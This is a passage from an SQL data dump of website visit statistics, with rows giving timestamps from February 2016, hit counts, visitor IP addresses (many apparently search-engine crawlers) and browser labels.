.180.229.232',''),(10048,1456675462,1,1,0,0,'40.77.167.68','other'),(10049,1456675491,1,1,0,0,'62.149.0.171','other'),(10050,1456675498,1,1,0,0,'66.249.64.177','other'),(10051,1456675529,1,1,0,0,'141.8.184.18','other'),(10052,1456675530,1,1,0,0,'141.8.183.14','other'),(10053,1456675531,1,1,0,0,'178.154.149.11','other'),(10054,1456675532,1,1,0,0,'5.255.253.53','other'),(10056,1456675713,1,1,0,0,'178.92.248.85','firefox'),(10057,1456676009,1,0,1,0,'66.249.66.166',''),(10058,1456676315,1,1,0,0,'8.29.198.25','other'),(10059,1456676317,1,1,0,0,'40.77.167.67','other'),(10060,1456676588,2,0,2,0,'68.180.229.232',''),(10061,1456676667,1,0,1,0,'66.249.64.177',''),(10062,1456676810,1,1,0,0,'217.69.133.203','other'),(10063,1456676898,1,1,0,0,'62.210.215.100','chrome'),(10064,1456676900,2,2,0,0,'207.46.13.180','other'),(10065,1456676937,1,1,0,0,'66.249.64.32','other'),(10066,1456677321,1,1,0,0,'66.249.89.90','other'),(10067,1456677382,1,1,0,0,'31.202.247.253','firefox'),(10068,1456678779,5,5,0,0,'141.8.183.14','other'),(10069,1456678849,7,7,0,0,'178.154.149.11','other'),(10071,1456678851,2,2,0,0,'141.8.184.18','other'),(10072,1456678852,3,3,0,0,'5.255.253.53','other'),(10073,1456678857,4,4,0,0,'93.158.152.9','other'),(10075,1456678945,1,0,1,0,'66.249.64.177',''),(10076,1456678946,2,1,1,0,'66.249.64.172',''),(10077,1456678957,2,1,1,0,'66.249.64.172',''),(10078,1456678968,2,1,1,0,'66.249.64.172',''),(10079,1456678982,3,1,2,0,'66.249.64.172',''),(10080,1456679005,2,2,0,0,'66.249.64.27','other'),(10081,1456679016,1,1,0,0,'66.249.64.22','other'),(10082,1456679028,5,4,1,0,'66.249.64.172',''),(10083,1456679403,1,1,0,0,'207.46.13.180','other'),(10084,1456679515,2,0,2,0,'68.180.229.232',''),(10085,1456679745,4,4,0,0,'178.151.143.163','other'),(10086,1456679854,1,1,0,0,'163.172.13.119','other'),(10087,1456680050,1,0,1,0,'66.249.64.172',''),(10088,1456680134,1,1,0,0,'40.77.167.67','other'),(10089,1456680143,1,1,0,0,'66.249.64.182','other'),(10090,1456680226,1,1,0,0,'94.179.113.20','firefox'),(10091,1456680294,1,1,0,0,'180.76.15.159','other'),(10092,1456680499,9,9,0,0,'93.158.152.9','other'),(10093,1456680500,14,14,0,0,'178.154.149.11','other'),(10095,1456680502,4,4,0,0,'141.8.183.14','other'),(10096,1456680504,2,2,0,0,'141.8.132.99','other'),(10097,1456680505,3,3,0,0,'5.255.253.100','other'),(10098,1456680509,2,2,0,0,'130.193.37.21','other'),(10099,1456680617,5,5,0,0,'141.8.184.18','other'),(10100,1456680626,1,0,1,0,'66.249.64.177',''),(10101,1456680633,2,2,0,0,'5.255.253.53','other'),(10102,1456681937,5,5,0,0,'66.249.64.182','other'),(10103,1456681941,1,0,1,0,'68.180.229.232',''),(10104,1456682144,2,2,0,0,'66.249.64.177','other'),(10105,1456682305,1,1,0,0,'66.249.64.172','other'),(10106,1456682325,3,3,0,0,'178.154.149.11','other'),(10108,1456682327,1,1,0,0,'130.193.37.21','other'),(10109,1456683101,3,2,1,0,'66.249.64.182',''),(10110,1456683511,2,2,0,0,'136.243.103.157','other'),(10111,1456683710,1,1,0,0,'91.196.178.164','chrome'),(10112,1456683788,1,1,0,0,'178.154.189.204','other'),(10113,1456683884,1,0,1,0,'66.249.64.172',''),(10114,1456683911,1,1,0,0,'82.145.221.45','chrome'),(10115,1456684017,1,1,0,0,'66.249.64.182','other'),(10116,1456684127,2,2,0,0,'66.249.64.177','other'),(10117,1456684256,1,0,1,0,'68.180.229.232',''),(10118,1456684410,2,2,0,0,'66.249.64.172','other'),(10119,1456684601,4,4,0,0,'178.154.149.11','other'),(10120,1456684604,2,2,0,0,'5.255.253.100','other'),(10121,1456684605,1,1,0,0,'130.193.37.21','other'),(10123,1456684718,1,1,0,0,'207.46.13.180','other'),(10124,1456684910,2,2,0,0,'5.255.253.53','other'),(10125,1456684914,1,1,0,0,'141.8.184.18','other'),(10126,1456684916,1,1,0,0,'141.8.132.99','other'),(10127,1456684917,1,1,0,0,'93.158.152.9','other'),(10128,1456684952,1,1,0,0,'40.77.167.68','other'),(10129,1456685048,1,1,0,0,'91.196.178.164','chrome'),(10130,1456685292,1,1,0,0,'217.69.133.224','other'),(10131,1456685316,1,1,0,0,'82.145.219.165','other'),(10132,1456685358,1,0,1,0,'66.249.64.27',''),(10133,1456685704,1,1,0,0,'66.249.64.172','other'),(10134,1456685765,2,2,0,0,'207.46.13.180','other'),(10135,1456685805,1,0,1,0,'66.249.64.32',''),(10136,1456685967,1,0,1,0,'66.249.64.177',''),(10138,1456686254,1,1,0,0,'91.196.177.19','chrome'),(10139,1456686690,2,2,0,0,'141.8.184.18','other'),(10140,1456686691,2,2,0,0,'141.8.183.14','other'),(10141,1456686984,1,0,1,0,'66.249.64.177',''),(10142,1456687150,1,1,0,0,'8.29.198.25','other'),(10143,1456687460,1,1,0,0,'62.210.215.100','chrome'),(10144,1456687470,1,1,0,0,'5.255.253.53','other'),(10145,1456687471,1,1,0,0,'5.255.253.100','other'),(10146,1456687473,1,1,0,0,'93.158.152.9','other'),(10147,1456687475,1,0,1,0,'68.180.229.232',''),(10148,1456687694,1,1,0,0,'40.77.167.68','other'),(10149,1456687961,1,1,0,0,'66.249.89.90','other'),(10150,1456688183,1,1,0,0,'207.46.13.180','other'),(10151,1456688667,2,1,1,0,'66.249.64.177',''),(10152,1456688814,1,0,1,0,'68.180.229.232',''),(10153,1456689074,1,1,0,0,'141.8.183.14','other'),(10154,1456689372,1,0,1,0,'66.249.64.172',''),(10155,1456689717,1,1,0,0,'93.158.152.9','other'),(10156,1456689718,1,1,0,0,'178.154.149.11','other'),(10157,1456689719,1,1,0,0,'130.193.37.21','other'),(10158,1456690127,1,0,1,0,'68.180.229.232',''),(10159,1456690315,1,1,0,0,'217.69.133.237','other'),(10160,1456690523,2,0,2,0,'66.249.64.182',''),(10161,1456690538,2,0,2,0,'66.249.64.177',''),(10162,1456690564,7,0,7,0,'66.249.64.172',''),(10163,1456690849,2,1,1,0,'66.249.64.172',''),(10164,1456691371,1,1,0,0,'207.46.13.180','other'),(10165,1456691909,1,0,1,0,'66.249.64.182',''),(10166,1456691941,3,3,0,0,'178.154.149.11','other'),(10167,1456691942,1,1,0,0,'141.8.184.18','other'),(10168,1456691943,1,1,0,0,'141.8.183.14','other'),(10169,1456692028,1,1,0,0,'89.169.153.186','chrome'),(10170,1456692087,12,12,0,0,'91.209.51.22','other'),(10171,1456692141,1,1,0,0,'66.249.64.177','other'),(10172,1456692877,1,1,0,0,'217.69.133.190','other'),(10173,1456693079,4,0,4,0,'66.249.64.177',''),(10174,1456693126,3,0,3,0,'66.249.64.172',''),(10175,1456693396,2,2,0,0,'93.158.152.9','other'),(10177,1456693397,2,2,0,0,'130.193.37.21','other'),(10178,1456693398,2,2,0,0,'141.8.132.99','other'),(10180,1456693399,1,1,0,0,'178.154.149.11','other'),(10181,1456693405,1,0,1,0,'66.249.64.182',''),(10182,1456693645,1,0,1,0,'66.249.64.32',''),(10183,1456693698,2,0,2,0,'66.249.64.22',''),(10184,1456693719,1,1,0,0,'66.102.9.94','firefox'),(10185,1456693805,1,1,0,0,'217.69.133.253','other'),(10186,1456693891,1,1,0,0,'207.46.13.28','other'),(10187,1456693960,1,1,0,0,'141.8.184.18','other'),(10188,1456694076,2,1,1,0,'66.249.64.182',''),(10189,1456694419,1,1,0,0,'40.77.167.68','other'),(10190,1456695273,1,1,0,0,'180.76.15.17','other'),(10191,1456695988,1,1,0,0,'178.151.160.121','other'),(10192,1456696098,1,1,0,0,'207.46.13.180','other'),(10193,1456696338,1,0,1,0,'68.180.229.232',''),(10194,1456696424,2,2,0,0,'144.76.8.132','other'),(10195,1456697025,2,0,2,0,'66.249.64.172',''),(10196,1456697225,1,1,0,0,'178.154.149.11','other'),(10197,1456697975,1,1,0,0,'8.29.198.25','other'),(10198,1456698027,1,0,1,0,'66.249.64.182',''),(10199,1456698310,1,1,0,0,'66.249.89.93','other'),(10200,1456698495,1,0,1,0,'66.249.64.172',''),(10201,1456698551,1,0,1,0,'66.249.64.22',''),(10202,1456698619,1,1,0,0,'40.77.167.68','other'),(10203,1456698816,1,1,0,0,'91.196.178.99','chrome'),(10204,1456699108,2,0,2,0,'66.249.64.177',''),(10205,1456699224,1,1,0,0,'62.210.215.100','chrome'),(10206,1456699389,10,10,0,0,'178.154.149.11','other'),(10207,1456699390,7,7,0,0,'141.8.184.18','other'),(10208,1456699391,3,3,0,0,'5.255.253.53','other'),(10209,1456699392,12,12,0,0,'141.8.183.14','other'),(10210,1456699396,7,7,0,0,'93.158.152.9','other'),(10211,1456699498,2,1,1,0,'66.249.64.182',''),(10212,1456699905,1,0,1,0,'66.249.64.27',''),(10213,1456700005,1,0,1,0,'66.249.64.32',''),(10214,1456701115,5,0,5,0,'66.249.64.172',''),(10215,1456701277,4,0,4,0,'66.249.64.177',''),(10216,1456701466,1,0,1,0,'66.249.64.182',''),(10217,1456701637,1,1,0,0,'66.249.64.172','other'),(10218,1456701925,1,1,0,0,'66.249.64.182','other'),(10219,1456702015,2,0,2,0,'68.180.229.232',''),(10220,1456702253,3,3,0,0,'66.249.64.177','other'),(10221,1456702813,1,0,1,0,'66.249.64.172',''),(10222,1456702888,1,1,0,0,'217.69.133.5','other'),(10223,1456703011,1,1,0,0,'66.249.64.182','other'),(10224,1456703272,1,1,0,0,'66.249.64.172','other'),(10225,1456703302,1,1,0,0,'130.193.51.45','other'),(10226,1456703409,2,0,2,0,'68.180.229.232',''),(10227,1456704176,2,0,2,0,'66.249.64.172',''),(10228,1456704206,2,0,2,0,'66.249.64.177',''),(10229,1456704738,1,0,1,0,'66.249.78.144',''),(10230,1456704813,1,1,0,0,'66.249.64.177','other'),(10231,1456705093,1,1,0,0,'217.69.133.231','other'),(10232,1456705455,1,0,1,0,'68.180.229.232',''),(10233,1456705568,1,1,0,0,'66.249.64.182','other'),(10234,1456705793,1,1,0,0,'66.249.64.32','other'),(10235,1456705899,7,7,0,0,'141.8.184.18','other'),(10236,1456705906,1,1,0,0,'93.158.152.9','other'),(10237,1456705909,2,2,0,0,'178.154.149.11','other'),(10238,1456705919,4,4,0,0,'141.8.183.14','other'),(10239,1456705922,1,1,0,0,'66.249.64.177','other'),(10240,1456706142,1,1,0,0,'130.193.37.21','other'),(10241,1456706803,6,6,0,0,'141.8.184.18','other'),(10242,1456706874,3,3,0,0,'178.154.149.11','other'),(10243,1456706890,1,1,0,0,'93.158.152.9','other'),(10244,1456706898,2,2,0,0,'5.255.253.53','other'),(10245,1456707374,1,0,1,0,'66.249.64.182',''),(10246,1456707622,2,2,0,0,'141.8.132.99','other'),(10247,1456707636,3,3,0,0,'141.8.183.14','other'),(10248,1456707641,1,1,0,0,'5.255.253.100','other'),(10249,1456707741,1,1,0,0,'157.55.39.194','other'),(10250,1456707805,2,0,2,0,'66.249.64.172',''),(10251,1456707977,3,3,0,0,'178.154.149.11','other'),(10252,1456707981,7,7,0,0,'141.8.184.18','other'),(10253,1456707993,3,3,0,0,'93.158.152.9','other'),(10254,1456708170,1,1,0,0,'5.255.253.53','other'),(10255,1456708240,2,0,2,0,'66.249.64.177',''),(10256,1456708826,1,1,0,0,'8.29.198.26','other'),(10257,1456708889,1,1,0,0,'141.8.132.99','other'),(10258,1456708909,2,2,0,0,'141.8.183.14','other'),(10259,1456708941,1,1,0,0,'66.249.89.90','other'),(10260,1456709034,1,1,0,0,'178.154.149.11','other'),(10261,1456709374,1,0,1,0,'66.249.64.177',''),(10262,1456709446,1,1,0,0,'141.8.132.66','other'),(10263,1456709570,1,1,0,0,'141.8.184.18','other'),(10264,1456709826,2,0,2,0,'68.180.229.232',''),(10265,1456709938,1,1,0,0,'178.154.149.11','other'),(10266,1456710147,1,1,0,0,'62.210.215.100','chrome'),(10267,1456710269,1,1,0,0,'66.249.64.177','other'),(10268,1456710415,1,1,0,0,'5.255.253.100','other'),(10269,1456710912,1,1,0,0,'5.255.253.79','other'),(10270,1456710934,1,0,1,0,'68.180.229.232',''),(10271,1456711383,1,1,0,0,'130.193.51.85','other'),(10272,1456711426,3,0,3,0,'66.249.64.177',''),(10273,1456711605,1,1,0,0,'5.255.253.100','other'),(10274,1456712121,2,2,0,0,'5.255.253.55','other'),(10275,1456712406,1,1,0,0,'207.46.13.28','other'),(10276,1456712583,2,2,0,0,'141.8.132.99','other'),(10277,1456712587,1,1,0,0,'130.193.51.45','other'),(10278,1456712590,2,2,0,0,'141.8.184.18','other'),(10279,1456712593,2,2,0,0,'141.8.132.2','other'),(10280,1456712596,1,1,0,0,'5.255.253.10','other'),(10281,1456712602,1,1,0,0,'130.193.51.81','other'),(10282,1456712605,2,2,0,0,'141.8.184.22','other'),(10283,1456712611,1,1,0,0,'130.193.51.102','other'),(10284,1456712614,3,3,0,0,'141.8.142.88','other'),(10285,1456712617,2,2,0,0,'5.255.253.30','other'),(10286,1456712622,2,2,0,0,'141.8.132.76','other'),(10287,1456712626,1,1,0,0,'141.8.132.79','other'),(10288,1456712628,4,4,0,0,'141.8.142.41','other'),(10289,1456712632,1,1,0,0,'130.193.51.85','other'),(10290,1456712639,2,2,0,0,'141.8.183.14','other'),(10291,1456712641,2,0,2,0,'66.249.64.182',''),(10292,1456712643,1,1,0,0,'5.255.253.110','other'),(10293,1456712663,1,1,0,0,'5.255.253.53','other'),(10294,1456712665,1,1,0,0,'130.193.37.21','other'),(10295,1456713020,1,1,0,0,'157.55.39.194','other'),(10296,1456713066,1,1,0,0,'180.76.15.143','other'),(10297,1456713567,1,0,1,0,'66.249.64.182',''),(10298,1456713626,1,1,0,0,'77.68.64.27','other'),(10299,1456714203,1,1,0,0,'141.8.132.74','other'),(10300,1456714352,1,1,0,0,'141.8.132.99','other'),(10301,1456715401,1,0,1,0,'66.249.64.172',''),(10302,1456715466,3,0,3,0,'66.249.64.177',''),(10303,1456715897,2,2,0,0,'207.46.13.28','other'),(10304,1456716199,1,1,0,0,'82.145.209.2','other'),(10305,1456716407,1,1,0,0,'66.249.64.172','other'),(10306,1456716487,1,1,0,0,'157.55.39.194','other'),(10307,1456716602,2,2,0,0,'178.154.149.11','other'),(10308,1456716862,1,1,0,0,'66.249.64.182','other'),(10309,1456717641,1,1,0,0,'66.249.64.172','other'),(10310,1456717848,2,2,0,0,'157.55.39.226','other'),(10311,1456718230,1,0,1,0,'66.249.64.182',''),(10312,1456718937,2,0,2,0,'66.249.64.172',''),(10313,1456719270,1,1,0,0,'66.249.89.90','other'),(10314,1456719282,1,1,0,0,'157.55.39.226','other'),(10315,1456719640,1,1,0,0,'8.29.198.25','other'),(10316,1456720385,2,1,1,0,'66.249.64.177',''),(10317,1456720590,1,0,1,0,'68.180.229.232',''),(10318,1456720725,1,1,0,0,'157.55.39.194','other'),(10319,1456720731,1,1,0,0,'66.249.64.22','other'),(10320,1456720737,1,0,1,0,'66.249.64.172',''),(10321,1456720774,2,1,1,0,'66.249.64.182',''),(10322,1456721462,1,1,0,0,'180.76.15.28','other'),(10323,1456721495,1,0,1,0,'66.249.64.177',''),(10324,1456721730,1,1,0,0,'62.210.215.100','chrome'),(10325,1456721931,1,1,0,0,'130.193.51.50','other'),(10326,1456722064,1,1,0,0,'207.46.13.28','other'),(10327,1456722524,1,0,1,0,'66.249.64.177',''),(10328,1456722747,2,0,2,0,'66.249.64.172',''),(10329,1456722806,1,0,1,0,'66.249.64.27',''),(10330,1456723284,1,1,0,0,'66.249.64.177','other'),(10331,1456723832,1,1,0,0,'37.229.205.59','chrome'),(10332,1456724238,2,1,1,0,'66.249.64.32',''),(10333,1456724299,2,0,2,0,'66.249.64.172',''),(10334,1456724532,1,0,1,0,'66.249.64.177',''),(10335,1456724811,1,0,1,0,'68.180.229.232',''),(10336,1456724901,1,1,0,0,'217.69.133.191','other'),(10337,1456725028,1,1,0,0,'207.46.13.28','other'),(10338,1456725453,1,0,1,0,'66.249.64.182',''),(10339,1456725685,1,1,0,0,'157.55.39.226','other'),(10340,1456725953,1,1,0,0,'66.249.64.172','other'),(10341,1456726159,1,1,0,0,'66.249.81.208','other'),(10342,1456726280,1,1,0,0,'66.249.64.182','other'),(10343,1456726607,1,1,0,0,'141.8.183.14','other'),(10344,1456726610,1,1,0,0,'130.193.50.22','other'),(10345,1456726960,2,0,2,0,'68.180.229.232',''),(10346,1456727041,3,3,0,0,'207.46.13.28','other'),(10347,1456727159,2,2,0,0,'91.196.178.69','firefox'),(10348,1456727408,1,1,0,0,'157.55.39.226','other'),(10349,1456727547,1,1,0,0,'66.249.64.182','other'),(10350,1456727560,1,1,0,0,'91.196.178.71','chrome'),(10351,1456727565,1,1,0,0,'91.196.178.69','chrome'),(10352,1456727607,1,1,0,0,'91.196.178.68','chrome'),(10353,1456727719,1,1,0,0,'91.196.178.68','firefox'),(10354,1456727784,1,0,1,0,'66.249.64.177',''),(10355,1456727971,1,1,0,0,'91.196.178.72','chrome'),(10356,1456728038,1,1,0,0,'66.249.64.172','other'),(10357,1456728139,1,1,0,0,'66.249.81.211','other'),(10358,1456728140,4,4,0,0,'91.209.51.22','other'),(10359,1456728168,2,2,0,0,'66.249.64.22','other'),(10360,1456728943,1,0,1,0,'66.249.64.182',''),(10361,1456729009,1,1,0,0,'66.249.64.27','other'),(10362,1456729033,1,0,1,0,'66.249.64.172',''),(10363,1456729495,1,1,0,0,'91.196.178.33','chrome'),(10364,1456729648,1,1,0,0,'195.189.249.165','opera'),(10365,1456729860,1,1,0,0,'157.55.39.20','other'),(10366,1456729927,2,1,1,0,'66.249.64.22',''),(10367,1456730201,3,3,0,0,'66.249.64.27','other'),(10368,1456730225,1,1,0,0,'78.111.185.68','firefox'),(10369,1456730246,1,0,1,0,'66.249.64.172',''),(10370,1456730475,1,1,0,0,'8.29.198.26','other'),(10371,1456730577,1,1,0,0,'66.249.64.182','other'),(10372,1456730632,1,1,0,0,'66.249.89.87','other'),(10373,1456730644,1,1,0,0,'66.249.64.177','other'),(10374,1456730753,1,1,0,0,'91.196.178.33','chrome'),(10375,1456730759,1,1,0,0,'66.249.64.172','other'),(10376,1456730887,2,1,1,0,'66.249.64.22',''),(10377,1456730922,2,2,0,0,'5.255.253.10','other'),(10379,1456730929,1,1,0,0,'141.8.132.79','other'),(10380,1456730932,1,1,0,0,'130.193.51.43','other'),(10381,1456730935,1,1,0,0,'93.158.152.9','other'),(10382,1456730938,2,2,0,0,'141.8.184.18','other'),(10383,1456731305,1,1,0,0,'66.249.64.27','other'),(10384,1456731430,3,3,0,0,'141.8.183.14','other'),(10385,1456731432,1,1,0,0,'5.255.253.53','other'),(10387,1456731514,1,1,0,0,'199.58.86.209','other'),(10388,1456731665,1,1,0,0,'66.249.64.22','other'),(10389,1456731856,2,1,1,0,'66.249.64.182',''),(10390,1456731935,1,1,0,0,'62.210.215.100','chrome'),(10391,1456732027,4,3,1,0,'66.249.64.177',''),(10392,1456732226,1,1,0,0,'194.44.244.66','chrome'),(10393,1456732330,1,1,0,0,'66.249.64.27','other'),(10394,1456732537,73,73,0,0,'136.243.36.97','other'),(10395,1456732707,2,1,1,0,'66.249.64.172',''),(10396,1456732865,1,1,0,0,'66.249.64.32','other'),(10397,1456733438,89,89,0,0,'136.243.36.97','other'),(10398,1456733542,1,1,0,0,'94.179.17.225','chrome'),(10399,1456733604,1,1,0,0,'141.8.132.97','other'),(10400,1456733605,1,1,0,0,'5.255.253.110','other'),(10401,1456733778,1,1,0,0,'178.154.189.203','other'),(10402,1456734183,2,0,2,0,'66.249.64.172',''),(10403,1456734248,1,1,0,0,'94.179.110.137','firefox'),(10404,1456734416,1,1,0,0,'78.111.187.129','firefox'),(10405,1456734735,1,1,0,0,'91.196.178.71','firefox'),(10406,1456735072,2,2,0,0,'157.55.39.20','other'),(10407,1456735163,3,0,3,0,'66.249.64.172',''),(10408,1456735231,1,0,1,0,'66.249.64.177',''),(10409,1456735267,1,1,0,0,'207.46.13.28','other'),(10410,1456735293,2,1,1,0,'66.249.64.177',''),(10411,1456735388,1,1,0,0,'141.8.142.10','other'),(10413,1456735389,2,2,0,0,'141.8.142.88','other'),(10414,1456735396,1,1,0,0,'66.249.81.211','other'),(10415,1456735463,1,1,0,0,'78.111.187.244','firefox'),(10416,1456735653,2,1,1,0,'66.249.64.172',''),(10417,1456735696,1,1,0,0,'91.196.178.131','chrome'),(10418,1456735923,1,1,0,0,'207.46.13.180','other'),(10419,1456735960,1,1,0,0,'141.8.184.11','other'),(10420,1456735961,1,1,0,0,'130.193.51.81','other'),(10421,1456736409,1,1,0,0,'157.55.39.20','other'),(10422,1456736562,1,1,0,0,'91.196.178.69','firefox'),(10423,1456736566,142,142,0,0,'82.193.127.15','other'),(10424,1456737185,2,2,0,0,'91.196.178.71','firefox'),(10425,1456737364,1,1,0,0,'91.196.178.69','chrome'),(10426,1456737587,1,1,0,0,'37.53.229.114','chrome'),(10427,1456737823,2,0,2,0,'68.180.229.232',''),(10428,1456737938,1,1,0,0,'91.196.178.69','firefox'),(10429,1456738267,1,1,0,0,'212.115.238.135','chrome'),(10430,1456738332,1,1,0,0,'141.8.132.2','other'),(10432,1456738333,1,1,0,0,'130.193.51.81','other'),(10433,1456738398,1,1,0,0,'91.196.178.68','chrome'),(10434,1456738412,1,1,0,0,'207.46.13.180','other'),(10435,1456738473,1,1,0,0,'62.210.215.100','chrome'),(10436,1456738511,1,1,0,0,'130.193.51.45','other'),(10437,1456738512,1,1,0,0,'93.158.152.26','other'),(10439,1456738573,1,1,0,0,'66.249.64.172','other'),(10440,1456738610,1,1,0,0,'91.196.178.71','firefox'),(10441,1456738929,1,1,0,0,'77.121.118.151','chrome'),(10442,1456738959,1,1,0,0,'66.249.81.208','other'),(10443,1456739047,1,1,0,0,'178.94.233.119','chrome'),(10444,1456739064,1,1,0,0,'91.196.178.69','chrome'),(10445,1456739120,1,1,0,0,'78.26.205.74','other'),(10446,1456739205,1,1,0,0,'213.156.68.10','chrome'),(10447,1456739762,1,1,0,0,'46.201.240.112','firefox'),(10448,1456740015,1,0,1,0,'66.249.64.177',''),(10449,1456740046,1,1,0,0,'178.92.248.85','firefox'),(10450,1456740134,1,1,0,0,'178.154.189.203','other'),(10451,1456740338,1,1,0,0,'94.179.44.207','firefox'),(10452,1456740419,1,1,0,0,'91.196.178.71','firefox'),(10453,1456740524,1,1,0,0,'141.8.132.2','other'),(10454,1456740535,1,1,0,0,'37.55.131.178','firefox'),(10455,1456740540,1,1,0,0,'91.196.178.67','firefox'),(10456,1456740756,1,1,0,0,'178.93.31.101','chrome'),(10457,1456741043,2,0,2,0,'66.249.64.182',''),(10458,1456741338,1,1,0,0,'8.29.198.25','other'),(10459,1456741379,1,1,0,0,'66.249.64.177','other'),(10460,1456741380,1,1,0,0,'162.210.196.98','other'),(10461,1456741451,1,1,0,0,'180.76.15.26','other'),(10462,1456741579,1,1,0,0,'66.249.64.32','other'),(10463,1456741772,4,0,4,0,'68.180.229.232',''),(10464,1456741910,1,1,0,0,'66.249.89.87','other'),(10465,1456741957,1,1,0,0,'62.210.215.100','chrome'),(10466,1456741958,1,1,0,0,'46.105.172.181','chrome'),(10467,1456741959,1,1,0,0,'178.33.168.223','chrome'),(10468,1456741993,1,0,1,0,'66.249.64.172',''),(10469,1456742433,1,1,0,0,'188.231.244.174','chrome'),(10470,1456742463,1,1,0,0,'46.200.27.224','chrome'),(10471,1456742733,1,1,0,0,'5.255.253.10','other'),(10472,1456743359,1,0,1,0,'66.249.64.182',''),(10473,1456743425,2,0,2,0,'68.180.229.232',''),(10474,1456743698,1,1,0,0,'66.249.64.32','other'),(10475,1456743720,3,1,2,0,'66.249.64.177',''),(10476,1456743778,1,1,0,0,'91.196.178.135','chrome'),(10477,1456743832,1,0,1,0,'66.249.64.172',''),(10478,1456743900,1,1,0,0,'46.200.27.224','chrome'),(10479,1456744076,1,1,0,0,'141.8.184.11','other'),(10480,1456744077,1,1,0,0,'130.193.51.81','other'),(10481,1456744078,1,1,0,0,'130.193.51.102','other'),(10482,1456744082,2,1,1,0,'66.249.64.182',''),(10483,1456744901,2,1,1,0,'66.249.64.177',''),(10484,1456745041,1,0,1,0,'68.180.229.232',''),(10485,1456745064,1,1,0,0,'178.93.31.101','chrome'),(10486,1456745130,2,0,2,0,'66.249.64.182',''),(10487,1456745175,1,1,0,0,'66.249.64.32','other'),(10488,1456745286,1,1,0,0,'89.22.206.234','chrome'),(10489,1456745361,1,0,1,0,'66.249.64.22',''),(10490,1456745366,2,0,2,0,'66.249.64.172',''),(10491,1456745599,3,0,3,0,'66.249.64.27',''),(10492,1456746129,1,1,0,0,'91.196.178.102','chrome'),(10493,1456746160,1,1,0,0,'66.249.81.205','other'),(10494,1456746461,1,1,0,0,'93.158.152.9','other'),(10495,1456746771,1,1,0,0,'66.249.93.90','firefox'),(10496,1456747032,1,0,1,0,'66.249.64.27',''),(10497,1456747033,1,0,1,0,'66.249.64.182',''),(10498,1456747037,6,0,6,0,'66.249.64.172',''),(10499,1456747053,1,0,1,0,'66.249.64.177',''),(10500,1456747374,1,1,0,0,'91.196.178.36','chrome'),(10501,1456747775,1,1,0,0,'66.249.64.172','other'),(10502,1456747889,1,1,0,0,'66.249.64.27','other'),(10503,1456748108,1,1,0,0,'40.77.167.8','other'),(10504,1456748224,1,1,0,0,'91.196.178.35','firefox'),(10505,1456748433,1,1,0,0,'141.8.132.109','other'),(10506,1456748461,1,1,0,0,'40.77.167.65','other'),(10507,1456748767,4,0,4,0,'66.249.64.177',''),(10508,1456749487,1,1,0,0,'85.115.62.180','other'),(10509,1456749627,1,1,0,0,'180.76.15.22','other'),(10510,1456749729,3,0,3,0,'66.249.64.177',''),(10511,1456749753,1,0,1,0,'66.249.64.172',''),(10512,1456749760,1,1,0,0,'217.69.133.190','other'),(10513,1456749771,1,1,0,0,'66.249.81.205','other'),(10514,1456749839,2,2,0,0,'82.193.127.15','other'),(10515,1456749963,2,0,2,0,'66.249.64.182',''),(10516,1456750182,1,1,0,0,'37.52.17.69','chrome'),(10517,1456750196,1,1,0,0,'66.249.64.27','other'),(10518,1456750418,1,1,0,0,'95.135.241.5','chrome'),(10519,1456750857,1,1,0,0,'180.76.15.155','other'),(10520,1456750977,1,1,0,0,'40.77.167.8','other'),(10521,1456751076,1,1,0,0,'95.133.113.17','chrome'),(10522,1456751325,1,1,0,0,'207.46.13.16','other'),(10523,1456751480,1,1,0,0,'94.178.83.70','firefox'),(10524,1456751607,1,0,1,0,'66.249.64.182',''),(10525,1456751826,13,0,13,0,'66.249.64.172',''),(10526,1456751949,2,0,2,0,'66.249.64.22',''),(10527,1456752064,3,0,3,0,'66.249.64.177',''),(10528,1456752099,1,1,0,0,'62.210.215.100','chrome'),(10529,1456752171,1,0,1,0,'66.249.64.27',''),(10530,1456752207,1,1,0,0,'8.29.198.26','other'),(10531,1456752218,2,0,2,0,'66.249.64.32',''),(10532,1456752241,1,1,0,0,'66.249.89.87','other'),(10533,1456752312,1,1,0,0,'40.77.167.65','other'),(10534,1456752359,1,1,0,0,'109.108.88.38','firefox'),(10535,1456752684,1,1,0,0,'178.154.189.204','other'),(10536,1456752938,1,1,0,0,'66.102.9.94','firefox'),(10537,1456753382,1,1,0,0,'95.133.63.209','chrome'),(10538,1456753624,3,1,2,0,'66.249.64.172',''),(10539,1456753707,1,1,0,0,'5.255.253.30','other'),(10540,1456753741,1,1,0,0,'66.249.64.177','other'),(10541,1456753791,1,1,0,0,'37.9.122.203','other'),(10542,1456753808,2,0,2,0,'68.180.229.232',''),(10543,1456754203,1,1,0,0,'66.249.64.172','other'),(10544,1456754218,1,1,0,0,'91.196.178.72','chrome'),(10545,1456754230,1,1,0,0,'37.52.17.69','chrome'),(10546,1456754558,2,0,2,0,'66.249.64.182',''),(10547,1456755768,1,1,0,0,'178.154.149.11','other'),(10548,1456756013,1,0,1,0,'68.180.229.232',''),(10549,1456756035,2,2,0,0,'91.196.178.69','firefox'),(10550,1456756196,1,1,0,0,'91.196.178.71','chrome'),(10551,1456756394,1,1,0,0,'157.55.39.34','other'),(10552,1456756424,1,1,0,0,'91.196.178.71','firefox'),(10553,1456756561,1,1,0,0,'107.189.60.71','other'),(10554,1456756563,1,1,0,0,'107.189.60.71','firefox'),(10555,1456756644,1,1,0,0,'92.113.157.112','firefox'),(10556,1456756711,1,1,0,0,'95.133.231.9','firefox'),(10557,1456756827,1,1,0,0,'107.178.194.69','chrome'),(10558,1456757004,1,1,0,0,'157.55.39.20','other'),(10559,1456757099,1,1,0,0,'217.69.133.229','other'),(10560,1456757102,2,0,2,0,'66.249.64.177',''),(10561,1456757161,1,1,0,0,'94.178.217.34','chrome'),(10562,1456757337,3,0,3,0,'66.249.64.172',''),(10563,1456757448,1,1,0,0,'207.46.13.143','other'),(10564,1456757467,1,1,0,0,'52.48.17.30','chrome'),(10565,1456757487,1,1,0,0,'37.9.122.203','other'),(10566,1456757568,2,0,2,0,'68.180.229.232',''),(10567,1456757730,1,1,0,0,'141.8.184.18','other'),(10568,1456757995,1,0,1,0,'66.249.64.182',''),(10569,1456758146,1,1,0,0,'91.196.178.69','firefox'),(10570,1456758283,1,1,0,0,'178.154.189.203','other'),(10571,1456758338,1,1,0,0,'46.200.201.168','firefox'),(10572,1456758530,1,1,0,0,'40.77.167.65','other'),(10573,1456758913,1,0,1,0,'66.249.64.182',''),(10574,1456759102,1,0,1,0,'66.249.64.172',''),(10575,1456759424,1,1,0,0,'157.55.39.34','other'),(10576,1456759435,1,0,1,0,'66.249.64.22',''),(10577,1456759462,1,1,0,0,'